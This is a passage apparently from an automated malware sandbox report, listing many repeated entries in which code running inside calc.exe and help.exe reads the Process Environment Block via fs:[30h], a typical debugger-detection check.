          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]9_2_0343B8D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]9_2_0343B8D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9080 mov eax, dword ptr fs:[00000030h]9_2_033A9080
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423884 mov eax, dword ptr fs:[00000030h]9_2_03423884
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423884 mov eax, dword ptr fs:[00000030h]9_2_03423884
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A58EC mov eax, dword ptr fs:[00000030h]9_2_033A58EC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DE730 mov eax, dword ptr fs:[00000030h]9_2_033DE730
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h]9_2_033A4F2E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h]9_2_033A4F2E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CF716 mov eax, dword ptr fs:[00000030h]9_2_033CF716
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478F6A mov eax, dword ptr fs:[00000030h]9_2_03478F6A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h]9_2_033DA70E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h]9_2_033DA70E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347070D mov eax, dword ptr fs:[00000030h]9_2_0347070D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347070D mov eax, dword ptr fs:[00000030h]9_2_0347070D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h]9_2_0343FF10
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h]9_2_0343FF10
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BFF60 mov eax, dword ptr fs:[00000030h]9_2_033BFF60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BEF40 mov eax, dword ptr fs:[00000030h]9_2_033BEF40
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B8794 mov eax, dword ptr fs:[00000030h]9_2_033B8794
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E37F5 mov eax, dword ptr fs:[00000030h]9_2_033E37F5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]9_2_03427794
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]9_2_03427794
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]9_2_03427794
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AE620 mov eax, dword ptr fs:[00000030h]9_2_033AE620
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h]9_2_033DA61C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h]9_2_033DA61C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]9_2_033AC600
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]9_2_033AC600
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]9_2_033AC600
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D8E00 mov eax, dword ptr fs:[00000030h]9_2_033D8E00
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461608 mov eax, dword ptr fs:[00000030h]9_2_03461608
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]9_2_033CAE73
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]9_2_033CAE73
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]9_2_033CAE73
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]9_2_033CAE73
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]9_2_033CAE73
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B766D mov eax, dword ptr fs:[00000030h]9_2_033B766D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345FE3F mov eax, dword ptr fs:[00000030h]9_2_0345FE3F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]9_2_033B7E41
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345FEC0 mov eax, dword ptr fs:[00000030h]9_2_0345FEC0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478ED6 mov eax, dword ptr fs:[00000030h]9_2_03478ED6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FE87 mov eax, dword ptr fs:[00000030h]9_2_0343FE87
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B76E2 mov eax, dword ptr fs:[00000030h]9_2_033B76E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D16E0 mov ecx, dword ptr fs:[00000030h]9_2_033D16E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]9_2_03470EA5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]9_2_03470EA5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]9_2_03470EA5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034246A7 mov eax, dword ptr fs:[00000030h]9_2_034246A7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D36CC mov eax, dword ptr fs:[00000030h]9_2_033D36CC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E8EC7 mov eax, dword ptr fs:[00000030h]9_2_033E8EC7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423540 mov eax, dword ptr fs:[00000030h]9_2_03423540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]9_2_033D4D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]9_2_033D4D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]9_2_033D4D3B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAD30 mov eax, dword ptr fs:[00000030h]9_2_033AAD30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]9_2_033B3D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h]9_2_033CC577
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h]9_2_033CC577
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C7D50 mov eax, dword ptr fs:[00000030h]9_2_033C7D50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478D34 mov eax, dword ptr fs:[00000030h]9_2_03478D34
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0342A537 mov eax, dword ptr fs:[00000030h]9_2_0342A537
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E3D43 mov eax, dword ptr fs:[00000030h]9_2_033E3D43
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]9_2_033D1DB5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]9_2_033D1DB5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]9_2_033D1DB5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov ecx, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]9_2_03426DC9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D35A1 mov eax, dword ptr fs:[00000030h]9_2_033D35A1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h]9_2_033DFD9B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h]9_2_033DFD9B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]9_2_033A2D8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]9_2_033A2D8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]9_2_033A2D8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]9_2_033A2D8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]9_2_033A2D8A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03458DF1 mov eax, dword ptr fs:[00000030h]9_2_03458DF1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h]9_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h]9_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034705AC mov eax, dword ptr fs:[00000030h]9_2_034705AC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034705AC mov eax, dword ptr fs:[00000030h]9_2_034705AC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DBC2C mov eax, dword ptr fs:[00000030h]9_2_033DBC2C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h]9_2_0343C450
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h]9_2_0343C450
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]9_2_03461C06
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]9_2_03426C0A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]9_2_03426C0A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]9_2_03426C0A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]9_2_03426C0A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]9_2_0347740D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]9_2_0347740D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]9_2_0347740D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C746D mov eax, dword ptr fs:[00000030h]9_2_033C746D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA44B mov eax, dword ptr fs:[00000030h]9_2_033DA44B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478CD6 mov eax, dword ptr fs:[00000030h]9_2_03478CD6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B849B mov eax, dword ptr fs:[00000030h]9_2_033B849B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]9_2_03426CF0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]9_2_03426CF0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]9_2_03426CF0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034614FB mov eax, dword ptr fs:[00000030h]9_2_034614FB
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]19_2_02A852A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]19_2_02A852A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]19_2_02A852A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]19_2_02A852A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]19_2_02A852A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]19_2_02B50EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]19_2_02B50EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]19_2_02B50EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B046A7 mov eax, dword ptr fs:[00000030h]19_2_02B046A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]19_2_02A9AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]19_2_02A9AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFAB0 mov eax, dword ptr fs:[00000030h]19_2_02ABFAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FE87 mov eax, dword ptr fs:[00000030h]19_2_02B1FE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h]19_2_02ABD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h]19_2_02ABD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB16E0 mov ecx, dword ptr fs:[00000030h]19_2_02AB16E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A976E2 mov eax, dword ptr fs:[00000030h]19_2_02A976E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58ED6 mov eax, dword ptr fs:[00000030h]19_2_02B58ED6
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB36CC mov eax, dword ptr fs:[00000030h]19_2_02AB36CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC8EC7 mov eax, dword ptr fs:[00000030h]19_2_02AC8EC7
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3FEC0 mov eax, dword ptr fs:[00000030h]19_2_02B3FEC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8E620 mov eax, dword ptr fs:[00000030h]19_2_02A8E620
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3FE3F mov eax, dword ptr fs:[00000030h]19_2_02B3FE3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]19_2_02A8C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]19_2_02A8C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]19_2_02A8C600
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA3A1C mov eax, dword ptr fs:[00000030h]19_2_02AA3A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h]19_2_02ABA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h]19_2_02ABA61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9766D mov eax, dword ptr fs:[00000030h]19_2_02A9766D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h]19_2_02B3B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h]19_2_02B3B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC927A mov eax, dword ptr fs:[00000030h]19_2_02AC927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58A62 mov eax, dword ptr fs:[00000030h]19_2_02B58A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]19_2_02AAAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]19_2_02AAAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]19_2_02AAAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]19_2_02AAAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]19_2_02AAAE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B14257 mov eax, dword ptr fs:[00000030h]19_2_02B14257
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]19_2_02A89240
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]19_2_02A89240
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]19_2_02A89240
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]19_2_02A89240
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]19_2_02A97E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B55BA5 mov eax, dword ptr fs:[00000030h]19_2_02B55BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]19_2_02B07794
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]19_2_02B07794
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]19_2_02B07794
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]19_2_02A91B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]19_2_02A91B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3D380 mov ecx, dword ptr fs:[00000030h]19_2_02B3D380
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABB390 mov eax, dword ptr fs:[00000030h]19_2_02ABB390
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4138A mov eax, dword ptr fs:[00000030h]19_2_02B4138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC37F5 mov eax, dword ptr fs:[00000030h]19_2_02AC37F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]19_2_02A84F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]19_2_02A84F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABE730 mov eax, dword ptr fs:[00000030h]19_2_02ABE730
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]19_2_02B1FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]19_2_02B1FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]19_2_02ABA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]19_2_02ABA70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4131B mov eax, dword ptr fs:[00000030h]19_2_02B4131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]19_2_02B5070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]19_2_02B5070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAF716 mov eax, dword ptr fs:[00000030h]19_2_02AAF716
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB60 mov ecx, dword ptr fs:[00000030h]19_2_02A8DB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9FF60 mov eax, dword ptr fs:[00000030h]19_2_02A9FF60
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]19_2_02AB3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]19_2_02AB3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58F6A mov eax, dword ptr fs:[00000030h]19_2_02B58F6A
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB40 mov eax, dword ptr fs:[00000030h]19_2_02A8DB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9EF40 mov eax, dword ptr fs:[00000030h]19_2_02A9EF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58B58 mov eax, dword ptr fs:[00000030h]19_2_02B58B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8F358 mov eax, dword ptr fs:[00000030h]19_2_02A8F358
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC90AF mov eax, dword ptr fs:[00000030h]19_2_02AC90AF
